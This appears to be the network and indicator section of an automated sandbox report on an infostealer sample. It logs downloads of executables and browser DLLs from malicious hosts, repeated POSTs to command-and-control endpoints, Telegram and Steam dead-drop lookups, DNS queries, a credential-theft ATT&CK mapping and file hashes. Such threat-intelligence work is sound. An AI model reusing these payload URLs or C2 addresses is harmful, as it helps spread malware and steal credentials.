Set-Cookie: PHPSESSID=agvicuiv57ts953kn0nsvl3818; expires=Fri, 24 Jan 2025 04:26:14 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UC59UTNhy1QTl0dSjCo906tukiG0Yq7e5hgxlH355dOlMy6JyGZeLGerabIJ%2Bq36R5wLNy1JsrrytuEWZ6SJLIA0i10QiBYx49hD7BCZCciNbQPcSUxutClVkip%2BlngjLHoy5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cb397087e713691-LHR
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request98.117.19.2.in-addr.arpaIN PTRResponse98.117.19.2.in-addr.arpaIN PTRa2-19-117-98deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request21.236.111.52.in-addr.arpaIN PTRResponse
-
2.0kB 19.8kB 28 21
HTTP Request
GET https://t.me/jamsemlgHTTP Response
200 -
10.6kB 9.8kB 31 25
HTTP Request
GET http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200 -
372.9kB 6.8MB 5202 5121
HTTP Request
GET http://urusvisa.com/sql.dllHTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
GET http://urusvisa.com/freebl3.dllHTTP Response
200HTTP Request
GET http://urusvisa.com/mozglue.dllHTTP Response
200HTTP Request
GET http://urusvisa.com/msvcp140.dllHTTP Response
200HTTP Request
GET http://urusvisa.com/softokn3.dllHTTP Response
200HTTP Request
GET http://urusvisa.com/vcruntime140.dllHTTP Response
200HTTP Request
GET http://urusvisa.com/nss3.dllHTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200 -
40.3kB 1.2MB 842 837
HTTP Request
GET http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exeHTTP Response
200HTTP Request
GET http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exeHTTP Response
200HTTP Request
GET http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exeHTTP Response
200 -
1.5kB 5.5kB 12 12
HTTP Request
POST https://possiwreeste.site/apiHTTP Response
200HTTP Request
POST https://possiwreeste.site/apiHTTP Response
200 -
1.0kB 4.5kB 9 9
HTTP Request
POST https://underlinemdsj.site/apiHTTP Response
200 -
1.5kB 42.3kB 21 36
HTTP Request
GET https://steamcommunity.com/profiles/76561199724331900HTTP Response
200 -
1.0kB 4.5kB 9 9
HTTP Request
POST https://chaptermusu.store/apiHTTP Response
200 -
193.6kB 5.4MB 3912 3892
HTTP Request
GET http://46.8.231.109/HTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dllHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dllHTTP Response
200HTTP Request
GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dllHTTP Response
200HTTP Request
GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dllHTTP Response
200HTTP Request
GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dllHTTP Response
200HTTP Request
GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dllHTTP Response
200HTTP Request
GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dllHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.phpHTTP Response
200HTTP Request
POST http://46.8.231.109/c4754d4f680ead72.php -
3.2kB 360 B 7 4
HTTP Request
POST http://cowod.hopto.org/HTTP Response
200 -
1.5kB 19.3kB 24 20
HTTP Request
GET https://t.me/jamsemlgHTTP Response
200 -
8.8kB 9.5kB 28 23
HTTP Request
GET http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200HTTP Request
POST http://urusvisa.com/HTTP Response
200 -
27.9kB 818.9kB 594 590
HTTP Request
GET http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exeHTTP Response
200HTTP Request
GET http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exeHTTP Response
200 -
1.5kB 5.6kB 12 12
HTTP Request
POST https://possiwreeste.site/apiHTTP Response
200HTTP Request
POST https://possiwreeste.site/apiHTTP Response
200 -
1.0kB 4.5kB 9 9
HTTP Request
POST https://underlinemdsj.site/apiHTTP Response
200 -
1.5kB 42.3kB 21 36
HTTP Request
GET https://steamcommunity.com/profiles/76561199724331900HTTP Response
200 -
1.0kB 4.5kB 9 9
HTTP Request
POST https://chaptermusu.store/apiHTTP Response
200
-
100 B 66 B 2 1
DNS Request
t.me
DNS Request
t.me
DNS Response
149.154.167.99
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
146 B 166 B 2 1
DNS Request
99.167.154.149.in-addr.arpa
DNS Request
99.167.154.149.in-addr.arpa
-
58 B 74 B 1 1
DNS Request
urusvisa.com
DNS Response
5.42.101.62
-
70 B 109 B 1 1
DNS Request
62.101.42.5.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.160.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
66 B 82 B 1 1
DNS Request
files.veritas.org.ng
DNS Response
147.45.44.104
-
70 B 144 B 1 1
DNS Request
58.55.71.13.in-addr.arpa
-
72 B 127 B 1 1
DNS Request
104.44.45.147.in-addr.arpa
-
63 B 95 B 1 1
DNS Request
possiwreeste.site
DNS Response
172.67.205.129104.21.22.157
-
62 B 127 B 1 1
DNS Request
famikyjdiag.site
-
64 B 129 B 1 1
DNS Request
commandejorsk.site
-
64 B 96 B 1 1
DNS Request
underlinemdsj.site
DNS Response
104.21.1.169172.67.129.166
-
73 B 135 B 1 1
DNS Request
129.205.67.172.in-addr.arpa
-
62 B 127 B 1 1
DNS Request
bellykmrebk.site
-
63 B 128 B 1 1
DNS Request
agentyanlark.site
-
62 B 127 B 1 1
DNS Request
writekdmsnu.site
-
63 B 128 B 1 1
DNS Request
delaylacedmn.site
-
64 B 80 B 1 1
DNS Request
steamcommunity.com
DNS Response
104.82.234.109
-
63 B 95 B 1 1
DNS Request
chaptermusu.store
DNS Response
172.67.207.133104.21.37.109
-
71 B 133 B 1 1
DNS Request
169.1.21.104.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
109.234.82.104.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
cowod.hopto.org
DNS Response
45.132.206.251
-
71 B 131 B 1 1
DNS Request
109.231.8.46.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
133.207.67.172.in-addr.arpa
-
73 B 134 B 1 1
DNS Request
251.206.132.45.in-addr.arpa
-
73 B 113 B 1 1
DNS Request
22.249.124.192.in-addr.arpa
-
62 B 127 B 1 1
DNS Request
famikyjdiag.site
-
64 B 129 B 1 1
DNS Request
commandejorsk.site
-
62 B 127 B 1 1
DNS Request
bellykmrebk.site
-
63 B 128 B 1 1
DNS Request
agentyanlark.site
-
62 B 127 B 1 1
DNS Request
writekdmsnu.site
-
63 B 128 B 1 1
DNS Request
delaylacedmn.site
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
98.117.19.2.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
21.236.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
371KB
MD532c2e31313c3df4a7a36c72503a5beba
SHA11c88051112dab0e306cadd9ee5d65f8dc229f079
SHA256f1fa2872fcd33c6dbce8d974c0c0381c0762d46a53ceaca14a29727ad02baef3
SHA512ee04d786e53f7fa203dbc4f8c018c72a907dabbd2d1c57e219b2ccc2dbd9d79a4ee8580b98f9b5c5024e628c0207cdd2bf93b9468e457f4ee00326c7c689f1ae
-
Filesize
404KB
MD538dabc7063c0a175a12c30bd44cf3dbc
SHA16d7aabebd8a417168e220c7497f4bc38c314da3b
SHA256de664956d799e59e1cca0788d545922ee420e3afdcf277442f148f52bc78df89
SHA512674760ad37cf7886ca4cd786e4d1966d3827fdad008a85a125e18bd474d073dae8d4296427253bb86e78d3173a300611ee5eb2e01c1f968700679350fc17a24d
-
Filesize
11KB
MD5dc40481573c282143a39cba43012401f
SHA1c3c16bc7ff9010407faf75e6a7c72fbd4c0385a4
SHA256e7deac159b16dc9359279b7c6bf8a1a4869a61f5ce7e2a882c17b82e50d9022c
SHA512ce67c4e3c761e2067c118fd8a27546b361907cf3d54893af50354e9d0c8555938b9a9dc881294ada4194291ee85b0e1bde23168c724990ab83c83e264ac67bf9
-
Filesize
114KB
MD5db26309558628fa1ef6a1edd23ab2b09
SHA19bfb0530d0c2dcc6f9b3947bc3ca602943356368
SHA256e6287cb739a35ef64a6d19ec146c90c848de8646032fd98d570042c0e2ecf070
SHA5124171bc6af1ffc5d24d6ddade7b47e94b0547297e25d9a4d45ca831801208b7d83edda0b138436626749711a953a5818486c293e8749c5c2539ef070e848b237c
-
Filesize
326KB
MD52832fbde1cf7ea83bd6fd6a4a5e8fe15
SHA11ced7a749d257091e0c3b75605fd3bc005e531de
SHA2562b8bcd9d7d072feb114e0436dc10aa80fda52cdd46a4948ea1ae984f74898375
SHA512c69f1197a0c74d057ab569d35c9af675fc465ce6abcc6c8fc32b316d3586871a426d7ab904c43827be7413748f0f45f7f3689076ca031fd858a4a8abf78b9299
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
20KB
MD5a603e09d617fea7517059b4924b1df93
SHA131d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc
-
Filesize
87KB
MD520b0ccea9a74ef454bdec596c2a85922
SHA1bb1b5358924b9fd9164ad5fc32faac7f69a978da
SHA2562433dbdd5da3f7c692446e5a4d0219392da5fe76b17c487a37d44ce5b9cdf2e5
SHA512308ebed94d3ee2f9b8afadf2269e4e4bbb5abd6a99b03dd3a77265822ac5032a69da2b7049a576f3abbf456d1367ed0b53ff938285152d48f267f31ce1a3e54d
-
Filesize
14KB
MD5c7ed18a92b9ddc312f4baa23be479011
SHA14b095ce52ed1f64e97a5f2b5025d864cb938c524
SHA256d08da443c4c739153b01e455af061142a6851b0615bc2e23ed21bd40f5f63ae0
SHA5127f6f4ad6829a44970396bb634fed7aa3df80807150bdaaace28a9636ee84cc5ccf03a7f9902b49c7be423570fc60199b190f71932dc3912aa0afcc6534f1b72c
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
78KB
MD5a37ee36b536409056a86f50e67777dd7
SHA11cafa159292aa736fc595fc04e16325b27cd6750
SHA2568934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA5123a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356
-
Filesize
425B
MD54eaca4566b22b01cd3bc115b9b0b2196
SHA1e743e0792c19f71740416e7b3c061d9f1336bf94
SHA25634ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1
-
Filesize
2.3MB
MD590e744829865d57082a7f452edc90de5
SHA1833b178775f39675fa4e55eab1032353514e1052
SHA256036a57102385d7f0d7b2deacf932c1c372ae30d924365b7a88f8a26657dd7550
SHA5120a2d112ff7cb806a74f5ec17fe097d28107bb497d6ed5ad28ea47e6795434ba903cdb49aaf97a9a99c08cd0411f1969cad93031246dc107c26606a898e570323